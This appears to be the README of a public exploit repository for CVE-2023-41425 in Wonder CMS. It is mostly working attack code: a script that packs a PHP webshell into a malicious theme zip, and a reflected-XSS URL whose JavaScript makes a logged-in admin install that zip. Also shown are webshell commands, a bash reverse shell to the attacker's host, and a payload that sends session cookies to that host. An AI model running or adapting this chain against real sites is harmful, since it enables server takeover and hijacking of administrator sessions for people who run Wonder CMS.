charlesgargasson/CVE-2023-41425
Wonder CMS RCE

RCE

# Setting vars
RHOST="http://host.com:80"
LHOST="10.10.14.152"
LPORT="4444"
LPORTWEB="80"

# Moving to a tmp dir
cd $(mktemp -d)

# Creating our evil theme zip file: installModule unpacks the archive under
# themes/, so the one-line webshell ends up at themes/evil/evil.php
mkdir -p evil
cat <<'EOF'>evil/evil.php
<?=`$_GET[0]`;?>
EOF

zip -r evil.zip evil/

# JS payload run in the admin's browser: reads the CSRF token from the page
# and asks installModule to fetch our zip from LHOST and install it as a theme
cat <<EOF>xssrce.js
var xhr=new XMLHttpRequest();
xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true);
xhr.send();
EOF

# Print XSS url: the page parameter is reflected unescaped into the login
# form's action attribute, so we close the attribute and the form, load our
# script, then reopen a form to keep the markup balanced
echo -e "\n# XSS RCE"
cat <<EOF
${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"></script><form+action="
EOF

# Starting a new web server to serve payloads
sudo python3 -m http.server $LPORTWEB &

After sending the XSS URL to a logged-in administrator, our web server sees the following HTTP calls (the 304 is the browser revalidating a cached copy of the script):
10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 -
10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

We can now use the PHP webshell that the theme install dropped at themes/evil/evil.php:
# id
CMD="id"
curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Reverse shell, (don't forget to listen first: nc -nvlp 4444)
CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"
curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

Cookies

You can also steal cookies (and therefore the PHP session) through the same injection point; note that document.cookie only exposes the session cookie if it is not flagged HttpOnly.
cat <<EOF>xsscookie.js
var xhr=new XMLHttpRequest();
xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true);
xhr.send();
EOF

echo -e "\n# XSS Retrieve PHP session"
cat <<EOF
${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"></script><form+action="
EOF
